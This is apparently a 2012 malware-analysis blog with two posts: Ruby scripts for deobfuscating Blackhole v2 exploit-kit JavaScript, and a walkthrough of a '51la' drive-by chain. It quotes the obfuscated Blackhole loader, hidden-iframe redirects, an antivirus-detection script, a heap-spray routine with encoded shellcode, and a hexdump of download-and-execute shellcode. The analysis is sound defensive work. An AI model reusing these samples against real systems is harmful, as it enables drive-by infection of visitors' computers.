Thursday, October 18, 2012

Blackhole v2 Deobfuscation from Ruby Perspective

Throughout this post, credit goes to Hooked on Mnemonics.

In this post, we'll going to go through quick explanation on Blackhole v2 JavaScript obfuscation and how to deobfuscate using ruby. Keep in mind that the obfuscation code might have change a bit from time to time, so, adjustment on ruby code is required as well. Thus please take note on any changes on obfuscation code used.

JavaScript Obfuscation

<html><head><title></title></head><body><div dqa="asd"></div><applet archive="hxxp://kennedyana.ru:8080/forum/links/column.php?xlkuwces=0837090803&ysxk=3b42&jtaziv=wqur&coqs=wyfelia" code="gbegbewewb"><param name="ui&#0000100;" value='0&#48;&#98;&#48;&#57;&#48;&#57;&#48;&#52;&#49;&#102;&#51;&#49;&#51;&#49;&#49;&#49;&#51;&#53;&#51;&#97;&#51;&#97;&#51;&#53;&#48;&#48;&#49;&#101;&#49;&#97;&#51;&#97;&#49;&#97;&#51;&#99;&#52;&#52;&#50;&#49;&#49;&#102;&#49;&#56;&#49;&#99;&#49;&#56;&#49;&#99;&#51;&#49;&#50;&#99;&#49;&#55;&#52;&#52;&#50;&#49;&#50;&#51;&#51;&#49;&#52;&#51;&#51;&#50;&#51;&#97;&#49;&#49;&#49;&#57;&#51;&#49;&#51;&#56;&#49;&#55;&#52;&#51;&#50;&#49;&#50;&#51;&#51;&#97;&#51;&#99;&#48;&#52;&#48;&#98;&#48;&#52;&#51;&#100;&#50;&#51;&#50;&#99;&#51;&#57;&#49;&#99;&#49;&#56;&#48;&#56;&#50;&#57;&#49;&#99;&#51;&#101;&#49;&#99;&#49;&#56;&#49;&#99;&#48;&#56;&#48;&#50;&#50;&#51;&#51;&#53;&#51;&#57;&#48;&#56;&#48;&#56;&#49;&#99;&#50;&#57;&#49;&#99;&#51;&#101;&#48;&#56;&#50;&#57;&#48;&#56;&#49;&#56;&#49;&#99;&#50;&#57;&#49;&#99;&#50;&#57;&#48;&#56;&#51;&#52;&#49;&#99;&#51;&#52;&#49;&#99;&#50;&#56;&#48;&#50;&#51;&#97;&#51;&#57;&#49;&#99;&#50;&#55;&#48;&#50;&#49;&#50;&#51;&#54;&#51;&#57;&#49;&#97;&#48;&#50;&#48;&#97;&#50;&#51;&#51;&#57;&#49;&#57;'/></applet><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");};ss=String.fromCharCode</script><div 12="131a1r1h([email protected]&3i3l1f3j3f+3o3a3c3h3m%1d3a1u1313)1d391d351d#3g1s393i3l*19391u1h1s!391t341f3f^383h3a3n3b_1s391c1c1a$3u3g1u342t([email protected]&3n3c3i3h40+403a1s351u%342t39301f)3h343g3840#403a1s3c39*19193b1f3n!383m3n193g^1a17171912_374040371f$3n383m3n19([email protected]&3n253" 3="3s#3j383i3911*351u1u133m!3n3l3c3h3a^131717191g_2u371g1a1f$3n383m3n19([email protected]&3g2k383a3r+1r1g2t2u37%302t2u372u)1f2u321d1e#301b1g1d3m*3j3f3c3n2g!3o3g2k383a^3r1r1g2t2u_1f2u321d1e$301g3a1d3a([email protected]&3n3c3i3h19+351d361a3u%3p343l1137)1u3n3b3c3m#1d341u371f*3c3m2l3n3l!2g3o3g1935^" 21="h36)3n3c3i3h19#381d351d37*1a3u3p343l!11341d361s^3c3919381a_3u3c391938$2t352t1h30([email protected]&3i3l19341u+1h1s341t35%1f3f383h3a)3n3b1s341u#341c1j1a3u*382t352t34!30301u352t^341c1i3041_41393i3l19$34113c3h11([email protected]&3c39193617+17362t352t%1h30301u1u)1i1a3u3n3b#3c3m1f3c3h*3c3n2h353d"

......

33="!2u1f212u37^1b1a1g3c1a_1f3n383m3n$193c1a1s36([email protected]&361f3c3m2h+3j383l3417%1719191g2o)383l3m3c3i#3h2u3m1b2u*1g2u3m1b19!2u371c2u1f^212u371b1a_1g3c1a1f3n$383m3n193c([email protected]&38283f3i34+3n192k383a%273r3j1f15)1i1d1i1h1a#1r3h3o3f3f*1s361f3437!372p3c3h27^3p383h3n19_133f3i3437$13" 79="83m36+3l3c3j3n3c%3i3h1a4040)371f3a383n#2g3o3g1935*1f3h343g38!1a1s3b1u37^1f3a383n2i_3f3o3a3c3h$283c3f382o([email protected]&1a1s3c3919+123b171737%1f2h2l1u1u)1i1a3u3c39#193a1f3j3f*3o3a3c3h2a!343m2f3c3g^382m3s3j38_19351d1334$3j3j3f3c36([email protected]&34373i3538+1f3j37393r%3g3f131d34)1a1a3u3b"></div><script>

if(020==0x10)a=document.getElementsByTagName(dd)[1];
s="";
for(i=0;;i++){
        if(window.document)r=a.getAttribute(i);
        if(r){s=s+r;}else break;
}
a=s;
asd();
s="";
for(i=0;i<a.length;i+=2){
        s+=ss(parseInt(a.substr(i,2),31));
}
c=s;
e=window["ev"+"a"+"l"];
try{("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
</script></body></html>

The snippet above is a normal Blackhole v2 HTML page that'll feed a suitable exploit for visitors. We'll focus more with the code within <script> and </script>. In general, the JavaScript will deobfuscate itself by;

1) Get all the element in 2nd <div> tag in HTML page

a=document.getElementsByTagName(dd)[1]

2) Loop through the 2nd <div> tag and cumulate the value of attribute inside the 2nd <div> (Note: the cumulation value will be in sequence)

for(i=0;;i++){
        if(window.document)r=a.getAttribute(i);
        if(r){s=s+r;}else break;
}

3) It will then delete the character /[^012a-z3-9]/ within the cumulated attribute values

asd(); OR asd=function(){a=a.replace(/[^012a-z3-9]/g,"");};

4) Next, it will get every 2 characters of cumulated attribute values at a time, and return the integer of base 31 and the ASCII value from the integer.

for(i=0;i<a.length;i+=2){
        s+=ss(parseInt(a.substr(i,2),31));
}

5- Lastly, it will eval the all the cumulated values in step 4.

e=window["ev"+"a"+"l"];
try{("321".substr+"zxc")();}catch(gdsgdsg){e(c);}

Deobfuscating with ruby

To deobfuscate above code with ruby, we can make use of pattern matching for attributes in <div> tag. Previous sample that I've seen, uses <div d01="blabla" d03="blabla" d02="blabla" ...>, and most of the samples now uses <div 1="blabla" 3="blabla" 2="blabla" ..>. So I use regex = /\s(\d{1,2})\=\"(.*?)\"/ for now. It might now work on every samples, tweaking the regex is required.

#!/usr/bin/ruby
require 'stringio'

content = ''
code = ''
base = 31
deobf = ''

File.open("test.lala", "r") { |f| content << f.read }

attribs = content.scan(/\s(\d{1,2})\=\"(.*?)\"/)

(0...attribs.length).each do |i|
        attribs[i][0] = attribs[i][0].to_i
end

attribs.sort!

(0...attribs.length).each do |i|
        code << attribs[i][1]
end

code.gsub!(/[^012a-z3-9]/,'')
code = StringIO.new(code)

while (1)
        a = code.read(2)
        if a.kind_of?(String)
                deobf << a.to_i(base).chr
        else
                break
        end
end

File.open("lala.html","w") { |f| f.write(deobf) }


Deobfuscation for show_pdf2

After successfully deobfuscating the JavaScript above, we can get the links to download the PDF exploit. Most of the parameter in URL to download the PDF exploit for Blackhole v2 will be obfuscated as below;

function x(s){d=[];for(i=0;i<s.length;i++){k=(s.charCodeAt(i)-46).toString(16);if(k.length==1)k="0"+k;d.push(k);};return d.join("");}

show_pdf2("hxxp://kennedyana.ru:8080/forum/links/column.php?mkih="+x("6e761")+"&itv="+x("n")+"&uqtfl=3307093738070736060b&yocom="+x(pdfver.join(".")))

Below are deobfuscation using ruby;

#!/usr/bin/ruby

pdfver = [9, 1, 1, 1]

def x(str)
        k = ''
        decoded = ''

        str.each do |s|
                k = (s.unpack('U')[0]-46).to_s(16)

                if k.length == 1
                        k = "0" + k
                end

                decoded << k
        end

        return decoded
end

puts "hxxp://kennedyana.ru:8080/forum/links/column.php?mkih="+x("6e761")+"&itv="+x("n")+"&uqtfl=3307093738070736060b&yocom="+x(pdfver.join("."))

Friday, October 12, 2012

51la Malware Embedded Attack

Early this morning, while doing normal stuff in front of laptop, I stumbled upon a URL which I have a feeling that it might be malicious: wbtg.51872210.com/ywtcpm120921/8ace3ds3f4fb.html. Lucky for me (I guess), the URL is still alive and I able to download its content.

The Redirection

After fetching the content of 8ace3ds3f4fb.html, I concentrate myself on the portion that might contains malicious embedded code (such as redirection/iframe/javascript). And yes, it have some javascript embedded, but the one that I'm interested in, is index.js

...
Snip
...
</BODY></HTML><script src="hxxp://s11.cnzz.com/stat.php?id=4581253&web_id=4581253" language="JavaScript"></script>
<script type="text/javascript" src="index.js" ></script>

Looking into index.js, the code contains an iframe to another URL, hxxp://wmb.5151lp.com/kk.html

var bOwa = navigator.userAgent.toLowerCase();

try {
   var s;
   var ss=new ActiveXObject("\x33\x36\x30\x53\x61\x66\x65\x4C"+"\x69\x76\x65\x2E"+"\x55\x70\x64\x61\x74\x65");
}
catch(s){};
finally {
   if((s=="[object Error]") && (bOwa.indexOf("360se")==-1) && (bOwa.indexOf("msie 9")==-1)) {
        document.write("<iframe src=hxxp://wmb.5151lp.com/kk.html width=116 height=1></iframe>");
   }
}

From hxxp://wmb.5151lp.com/kk.html, I get an obfuscated JS code (PASTEBIN). 

<script>var ckabc=eval;try{alert(a,b,c);}catch(e){ckabc(function(/*ck vip*/p,/*ck vip*/a,/*ck vip*/c,/*ck vip*/k,/*ck vip*/e,/*ck vip*/d/*ck vip*/){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];

...

(t);',62,216,'||||||||||var|out||str||len|charCodeAt|case||length||return|if||c3|||c4|||0xff|||while|||break|sum|c2|String|fromCharCode|nbChar|0xffffffff|63||function|char2|mx|c1||AVgHbu2f|do|X3cQCMIIF|||ErTiUlaxlkP|delta|char3|6b|join|0x3F|BMOYPRD4H|||||||||||str2long|for|61|vl|74|65|key|nbencode|52|GIEMslIELDjE|nbcode|NtCion|utf8to16|long2str|sl|false|MYKEY|57|62|Array|53|55|54|

...

|8LtGCo1KTBLkuLxBQxwKwUi0hC9WGI30Ll3WuvTUI2lqsUhOFxzclRfbQgCTIwjifli1q|||||||||||AJvzvYnS37tvhGB0Q8wXKpaJI|HplD80sXTFEoEZ|DPwUqt|2V8ivu9Y13m9nqQSg8rN|fOvmYQvkBXXNmtdcp7swtEf6WWz8DKZ5FULCIY9SUbv2qHZHT3fYj9E7M8wQ6gSsDCLMmkMo3TAyosj3rGqkCnNzuPymVGb9|GguYcZXhH8iz4CLJQrAcSJovghxKiIzXzUyiHyMDzW4N7wNEOE9oVabADxVEkSCC0cqxefhZiOzzebb1sFukgfgdohewLv90P|window|43|IJGbt5Bd8HhsU982|Um6ZS0Ntts|YcoQQAxsZ5TtTZ0Vm6RZ8qIMdPieVQjLVQaG6ZqLBuzR33p|JzznFVHaUz4kVs38VjlAmdjYoGQYyUVycKOS|8itFIvCwP1Fq7AzILaHEyt9sVB8DPZBl|Vb0VwMO|kn0|D20GWWbGli3C9wTOHftmKvHHjBalZiqDWrBLST4jp|HZfPtBoR|AxvlyDenPYzIKN|SCYZ7|eS5av9AYyYaMB7ZkK8JRp50jBCFQRm8XSZJvJkDhtbGs7B9jYByhTaX'.split('|'),0,{}))}</script>

When it comes to obfuscated JS code, I've been using manual analysis + spidermonkey since from the beginning. After finding out about JSDetox for a few weeks, and I must say, manual analysis with JSDetox has become quite handy sometimes, especially when manually tracking variable values, and deobfuscating JS code on DOM level. 

The obfuscated code above has multiple obfuscation, but with JSDetox I utilize the "Send to Analyze" and execute one more time. And from there, I get deobfuscated JS code (PASTEBIN) with an Iframe to cc.html. Along with Iframe, it also tries to check whether ksafe, kingsoft antivirus, 360QBack, 360safe and NODE32 are installed, and not other major AV, I have no idea why, I suspect they're trying to check whether fake AV is installed.

function ckrav(){
  var EasGXqAf1 = ['res://C:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://D:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://E:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://F:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://C:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://D:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://E:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://F:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://C:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://D:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://E:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://F:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://C:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://D:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://E:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://F:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://C:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://D:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://E:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://F:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171'];

  for(i = 0; i < EasGXqAf1["length"]; i++) {
    ischeck = 1;
    x = new Image();
    x["src"] = "";
    x["onerror"] = function() {
      ischeck = 0;
    };
    x["src"] = EasGXqAf1[i];
    if(ischeck == 1) {
      return 1;
    }
    delete x;
  }
  return 0;
}

if(!ckrav()) {
  document.write("<iframe src=cc.html width=116 height=1></iframe>");
}

Following the content of  hxxp://wmb.5151lp.com/cc.html, thecode contains another Iframe which is ppp.html and external JS code from 51.la URL. I've actually read about 51la malware previously on Donovan's blog post but I still don't get what it (the 51la malware) actually do. However, according to his latest post, Norman Lab has confirmed about its maliciousness.

Below are the content from cc.html;

<script language="JavaScript">
function lovexckwm(){
   var ckxo = navigator.userAgent.toLowerCase();
   var polo = new String(document.cookie);
   var colo = "ck006=";
   var cksun = polo.indexOf(colo);

   if (cksun == -1)
   {
       var osome = new Date();
       osome.setTime(osome.getTime()+1*60*60*1000);
       document.cookie = "ck006=yes;expires=" + osome.toGMTString();

       if(ckxo.indexOf("msie")>0)
       {
          document.write("<iframe src=ppp.html width=60 height=1></iframe>");
       }
   }
}
lovexckwm();
</script>

<script language="javascript" type="text/javascript" src="http://js.users.51.la/14908642.js"></script>


The Exploitation

I downloaded the ppp.html and 14908642.js from both URL inside cc.html.

From the content of 14908642.js (PASTEBIN), it somehow similar with Donovan's blogpost which came to our suspicion that why the <img> has an .asp extension in its src option.

Moving to ppp.html, I get an heavily obfuscated JS code which I then manually analyzed with JSDetox to strip the script from HTML tag (beautified version in PASTEBIN). With the beautified version, I identified 2 parts from the content, (1) an obfuscation using packed function, (2) heaplib exploitation library developed by Alexander Sotirov.

The Shellcode

Since the heaplib.js require shellcode to deliver the payload, I'm pretty sure it reside on the part of obfuscated code. By deobfuscating the first part of the code (PASTEBIN), I managed to see obfuscated shellcode with another heaplib exploitation library.

From there, I deobfuscate the shellcode and got;

<script>
function ckckckckckckckck(__){var _='';for(var ___=0;___<__['length'];___+=4){_+='cgTw6'+__.substr(___,4);} return _;}

var x1 = new Array, x2 = '', x3;

for(var i=0;i<ss.length;i++ ){x1[i]=ss[i]-38;x2+=x1[i].toString(16);}
x3 = ckckckckckckckck(x2);
var Abqj6 = '%'+'u';
var ckwmckwm = Abqj6+'90'+'90'+Abqj6+'90'+'90'+Abqj6+'5858'+'cgTw65858cgTw610EBcgTw64B5BcgTw6C933cgTw6B966cgTw603B8cgTw63480cgTw6BD0BcgTw6FAE2cgTw605EBcgTw6EBE8'+'cgTw6FFFF'+Abqj6+'54FFcgTw6BEA3'+'cgTw6bdbdcgTw6D9E2'+'cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536'+'cgTw636B5cgTw6D74AcgTw6E4ACcgTw60355cgTw6BDBF'+'cgTw62DBDcgTw6455F'+'cgTw68ED5'+'cgTw6'+'BD8F'+'cgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw6B1FBcgTw60355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4B8cgTw62355'+'cgTw6BDBF'+'cgTw65FBDcgTw6D544cgTw6D3D2cgTw6BDBDcgTw6C8D5cgTw6D1CFcgTw6E9D0cgTw6AB42cgTw67D38cgTw6AEC8cgTw6D2D5cgTw6BDD3cgTw6D5BDcgTw6CFC8cgTw6D0D1cgTw636E9cgTw6B1FBcgTw63355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4BCcgTw6D355cgTw6BDBFcgTw65FBDcgTw6D544'+'cgTw68ED1'+'cgTw6BD8FcgTw6CED5cgTw6D8D5'+Abqj6+'E9D1cgTw6FB36cgTw655B1cgTw6BCD2cgTw6BDBDcgTw65536cgTw6BCD7cgTw655E4cgTw6BFF2cgTw6BDBDcgTw6445FcgTw6513CcgTw6BCBDcgTw6BDBDcgTw66136cgTw67E3CcgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6A7D7cgTw6D7EEcgTw642BDcgTw6E1EBcgTw67D8EcgTw63DFDcgTw6BE81'+'cgTw6C8BD'+'cgTw67A44cgTw6BEB9cgTw6D6E1cgTw6D893cgTw6F97AcgTw6B9BEcgTw6D8C5cgTw6BDBDcgTw6748EcgTw6ECECcgTw6EAEEcgTw68EECcgTw6367DcgTw6E5FBcgTw69F55cgTw6BDBCcgTw63EBDcgTw6BD45cgTw638B2cgTw6BD68cgTw6BDBDcgTw6BDD7cgTw6BDD7cgTw6BED7cgTw6BDD7cgTw6BFD7cgTw6BDD5cgTw6BDBDcgTw6EE7DcgTw6FB36cgTw65599cgTw6BCBCcgTw6BDBDcgTw6FB34cgTw6D7DDcgTw6EDBDcgTw6EB42cgTw63495cgTw6D9FBcgTw6FB36cgTw6D7DDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw6D7B9cgTw6EDBDcgTw6EB42cgTw6D791cgTw6D7BDcgTw6D7BDcgTw6D5BDcgTw6BDA2cgTw6BDB2cgTw642EDcgTw681EBcgTw6FB34cgTw636C5cgTw6D9F3cgTw6C13DcgTw642B5cgTw6C91FcgTw63DB1cgTw6B5C1'+'cgTw6BD42'+'cgTw6B8C9'+'cgTw6C93DcgTw642B5'+'cgTw65F1F'+'cgTw63456'+'cgTw63D3BcgTw6BDBDcgTw67ABDcgTw6CDFBcgTw6BDBDcgTw6BDBDcgTw6FB7AcgTw6BDC9cgTw6BDBDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw636BDcgTw6DDFBcgTw642EDcgTw685EBcgTw63B36cgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6F330cgTw6ECC9cgTw6CB42cgTw6EDCDcgTw6CB42cgTw642DDcgTw68DEBcgTw6CB42'+'cgTw642DDcgTw689EBcgTw6CB42cgTw642C5cgTw6FDEBcgTw64636cgTw67D8EcgTw6668EcgTw6513CcgTw6BFBDcgTw6BDBDcgTw67136cgTw6453EcgTw6C0E9cgTw634B5cgTw6BCA1cgTw67D3EcgTw656B9cgTw6364EcgTw63671cgTw63E64cgTw6AD7EcgTw67D8EcgTw6ECEDcgTw6EDEEcgTw6EDEDcgTw6EDED'+'cgTw6EAED'+'cgTw6EDEDcgTw6EB42cgTw636B5cgTw6E9C3cgTw6AD55cgTw6BDBCcgTw655BDcgTw6BDD8cgTw6BDBDcgTw6DED5cgTw6CACBcgTw6D5BDcgTw6D5CEcgTw6D2D9cgTw636E9cgTw6B1FBcgTw69955cgTw6BDBDcgTw634BDcgTw681FBcgTw61CD9cgTw6BDB9cgTw6BDBDcgTw61D30cgTw642DDcgTw64242cgTw6D8D7cgTw6CB42cgTw63681cgTw6ADFBcgTw6B555cgTw6BDBD'+'cgTw68EBDcgTw6EE66cgTw6EEEEcgTw642EEcgTw63D6DcgTw65585cgTw6853DcgTw6C854cgTw63CACcgTw6B8C5cgTw62D2DcgTw62D2DcgTw6B5C9cgTw64236cgTw636E8cgTw63051cgTw6B8FDcgTw65D42cgTw61B55cgTw6BDBDcgTw67EBDcgTw61D55cgTw6BDBDcgTw605BDcgTw6BCACcgTw63DB9cgTw6B17FcgTw655BD'+'cgTw6BD2EcgTw6BDBDcgTw6513CcgTw6BCBDcgTw6BDBDcgTw64136cgTw67A3EcgTw67AB9cgTw68FBAcgTw62CC9cgTw67AB1cgTw6B9FAcgTw634DEcgTw6F26CcgTw6FA7AcgTw61DB5cgTw62AD8cgTw67A76cgTw6B1FAcgTw6FDECcgTw6C207cgTw6FA7AcgTw683ADcgTw60BA0cgTw67A84'+Abqj6+'A9FAcgTw6D405'+'cgTw6A669cgTw6FA7AcgTw603A5cgTw6DBC2cgTw67A1DcgTw6A1FAcgTw61441cgTw6108AcgTw6FA7AcgTw6259DcgTw6ADB7cgTw6D945cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536cgTw636B5cgTw6D74AcgTw6E4B9cgTw6E955cgTw6BDBDcgTw62DBDcgTw6455FcgTw68ED5'+'cgTw6BD8FcgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw655BBcgTw642E8cgTw64242cgTw65536cgTw6B8D7cgTw655E4cgTw6BD88cgTw6BDBDcgTw6445FcgTw6428EcgTw642EAcgTw6B9EBcgTw6BF56cgTw67EE5cgTw64455cgTw64242cgTw6E642cgTw6BA7BcgTw63405cgTw6BCE2cgTw67ADBcgTw6B8FAcgTw65D42cgTw6EE7EcgTw66136cgTw6D7EEcgTw6D5FDcgTw6ADBDcgTw6BDBDcgTw636EA'+'cgTw69DFBcgTw6A555cgTw64242cgTw6E542cgTw6EC7EcgTw636EBcgTw681C8cgTw6C936cgTw6C593cgTw648BEcgTw636EBcgTw69DCBcgTw648BEcgTw6748EcgTw6FCF4cgTw6BE10cgTw68E78cgTw6B266'+'cgTw6AD03cgTw66B87cgTw6B5C9cgTw6767CcgTw6BEBAcgTw6FD67cgTw64C56cgTw6A286cgTw65AC8cgTw636E3cgTw699E3cgTw660BEcgTw636DBcgTw6F6B1cgTw6E336cgTw6BEA1cgTw63660cgTw636B9cgTw678BEcgTw6E316cgTw67EE4cgTw66055cgTw64241cgTw60F42cgTw65F4FcgTw68449'+'cgTw6C05FcgTw6673EcgTw6C6F5cgTw68F80cgTw62CC9cgTw638B1cgTw61262cgTw6DE06cgTw66C34cgTw6ECF2cgTw607FDcgTw61DC2cgTw62AD8cgTw6A376cgTw6D919cgTw62E52cgTw6598FcgTw63329cgTw6B7AEcgTw67F11cgTw6F6A4cgTw679BCcgTw6A230cgTw6EAC9cgTw6B0DBcgTw6FE42cgTw61103'+'cgTw6C066cgTw6184DcgTw6EF27cgTw61A43cgTw68367cgTw60BA0cgTw60584'+Abqj6+'69D4cgTw603A6cgTw6DBC2cgTw6411DcgTw68A14cgTw62510cgTw6ADB7cgTw63D45cgTw6126BcgTw64627'+Abqj6+'A8EE'+x3+'cgTw6C3C3';

var code = unescape(ckwmckwm.replace(/cgTw6/g,Abqj6));
var nops = unescape("%"+"u0c0"+"c"+"%"+"u0c0"+"c");
var nops_90 = unescape("%"+"ub3d6"+"%"+"u4f92");

while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, 0x100);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);

The shellcode somehow encoded with XOR. By using malzilla, I manage to get the XOR key, which is "BD". From there, it is a normal payload to download and execute ttxz.txt from the same server. The name implies that we are dealing with a text file, but in fact it is a data file.

00000000  2d 2d 2d 2d e5 e5 e5 e5  56 ad e6 f6 8e 74 db 04  |----....V....t..|
00000010  05 be 3d 89 b6 00 5f 47  56 b8 55 56 42 42 42 e9  |..=..._GV.UVBBB.|
00000020  1e 03 00 00 5f 64 a1 30  00 00 00 8b 40 0c 8b 70  |[email protected]|
00000030  1c ad 8b 68 08 8b f7 6a  11 59 e8 be 02 00 00 90  |...h...j.Y......|
00000040  e2 f8 68 33 32 00 00 68  55 73 65 72 54 8b 46 0c  |..h32..hUserT.F.|
00000050  e8 be 01 00 00 8b e8 6a  05 59 e8 9e 02 00 00 e2  |.......j.Y......|
00000060  f9 68 6f 6e 00 00 68 75  72 6c 6d 54 ff 16 85 c0  |.hon..hurlmT....|
00000070  75 13 68 6f 6e 00 00 68  75 72 6c 6d 54 8b 46 0c  |u.hon..hurlmT.F.|
00000080  e8 8e 01 00 00 8b e8 6a  01 59 e8 6e 02 00 00 e2  |.......j.Y.n....|
00000090  f9 68 6c 33 32 00 68 73  68 65 6c 54 8b 46 0c e8  |.hl32.hshelT.F..|
000000a0  6f 01 00 00 8b e8 6a 01  59 e8 4f 02 00 00 e2 f9  |o.....j.Y.O.....|
000000b0  81 ec 00 01 00 00 8b dc  81 c3 80 00 00 00 6a 00  |..............j.|
000000c0  6a 1a 53 6a 00 ff 56 5c  33 c0 40 80 3c 03 00 75  |j.Sj..V\[email protected]<..u|
000000d0  f9 c7 04 03 5c 6b 2e 65  c7 44 03 04 78 65 00 00  |....\k.e.D..xe..|
000000e0  33 c9 51 51 53 57 51 33  c0 8b 46 58 e8 22 01 00  |3.QQSWQ3..FX."..|
000000f0  00 83 f8 00 0f 85 d5 00  00 00 6a 00 6a 00 6a 03  |..........j.j.j.|
00000100  6a 00 6a 02 68 00 00 00  c0 53 8b 46 24 e8 01 01  |j.j.h....S.F$...|
00000110  00 00 89 46 60 6a 00 50  ff 56 28 89 46 64 8b 46  |...F`j.P.V(.Fd.F|
00000120  60 6a 00 6a 00 6a 00 6a  04 6a 00 50 ff 56 2c 6a  |`j.j.j.j.j.P.V,j|
00000130  00 6a 00 6a 00 68 1f 00  0f 00 50 ff 56 3c 89 46  |.j.j.h....P.V<.F|
00000140  78 8b 4e 64 80 7c 08 ff  a2 74 0c 80 7c 08 ff 00  |x.Nd.|...t..|...|
00000150  74 05 80 74 08 ff a2 e2  eb 89 86 80 00 00 00 c7  |t..t............|
00000160  46 70 00 00 00 00 c7 46  74 00 00 00 00 6a 00 6a  |Fp.....Ft....j.j|
00000170  00 6a 00 8b 46 60 50 ff  56 38 8b 86 80 00 00 00  |.j..F`P.V8......|
00000180  6a 00 8d 4e 74 51 ff 76  70 50 ff 76 60 ff 56 30  |j..NtQ.vpP.v`.V0|
00000190  ff 76 60 ff 56 34 ff 76  78 ff 56 40 8b fb 33 c0  |.v`[email protected]|
000001a0  33 db 81 ec 00 02 00 00  8b cc 83 f8 54 7d 08 89  |3...........T}..|
000001b0  1c 01 83 c0 04 eb f3 8b  cc 8b d9 83 c3 10 33 c0  |..............3.|
000001c0  50 51 53 50 50 50 50 50  50 57 50 50 ff 56 08 8b  |PQSPPPPPPWPP.V..|
000001d0  7e 54 e8 10 01 00 00 e8  65 00 00 00 68 63 76 77  |~T......e...hcvw|
000001e0  00 68 73 68 64 6f 54 8b  46 0c e8 24 00 00 00 89  |.hshdoT.F..$....|
000001f0  46 3c 64 a1 04 00 00 00  8d a0 60 ff ff ff 6a 65  |F<d.......`...je|
00000200  ff 76 3c 8b 46 10 e8 08  00 00 00 33 db 53 53 53  |.v<.F......3.SSS|
00000210  53 ff d0 80 38 e8 80 38  e9 75 11 81 78 05 90 90  |S...8..8.u..x...|
00000220  90 90 74 08 8b ff 55 8b  ec 8d 40 05 ff e0 e8 a6  |[email protected]|
00000230  00 00 00 c3 e8 a0 00 00  00 b8 11 01 04 80 c2 0c  |................|
00000240  00 e8 93 00 00 00 81 ec  00 01 00 00 8b fc 83 c7  |................|
00000250  04 c7 07 32 74 91 0c c7  47 04 63 89 d1 4f c7 47  |...2t...G.c..O.G|
00000260  08 a0 65 97 cb c7 47 0c  51 40 ba 7f c7 47 10 3e  |[email protected]>|
00000270  1d b6 39 c7 47 14 b8 69  d4 1b c7 47 18 be 7f 66  |..9.G..i...G...f|
00000280  a0 c7 47 1c fc a9 37 ad  c7 47 20 98 0a 10 f8 64  |..G...7..G ....d|
00000290  a1 30 00 00 00 8b 40 0c  8b 70 1c ad 8b 68 08 8b  |[email protected]|
000002a0  f7 6a 04 59 e8 54 00 00  00 90 e2 f8 68 33 32 00  |.j.Y.T......h32.|
000002b0  00 68 55 73 65 72 54 8b  06 e8 55 ff ff ff 8b e8  |.hUserT...U.....|000002c0  6a 05 59 e8 35 00 00 00  e2 f9 33 ff 57 ff 56 04  |j.Y.5.....3.W.V.|
000002d0  eb 02 58 c3 e8 f9 ff ff  ff 5b c6 07 b8 89 5f 01  |..X......[...._.|
000002e0  66 c7 47 05 ff e0 c3 53  8b dc 53 6a 40 68 00 10  |[email protected]|
000002f0  00 00 57 8b 46 20 e8 18  ff ff ff 58 c3 51 56 8b  |..W.F .....X.QV.|
00000300  75 3c 8b 74 2e 78 03 f5  56 8b 76 20 03 f5 33 c9  |u<.t.x..V.v ..3.|
00000310  49 41 ad 03 c5 33 db 0f  be 10 3a d6 74 08 c1 cb  |IA...3....:.t...|
00000320  07 03 da 40 eb f1 3b 1f  75 e7 5e 8b 5e 24 03 dd  |[email protected];.u.^.^$..|
00000330  66 8b 0c 4b 8b 5e 1c 03  dd 8b 04 8b 03 c5 ab 5e  |f..K.^.........^|
00000340  59 c3 e8 dd fc ff ff b2  f2 e2 f4 39 e2 7d 83 da  |Y..........9.}..|
00000350  48 7b 3d 32 74 91 0c 85  df af bb 63 89 d1 4f 51  |H{=2t......c..OQ|
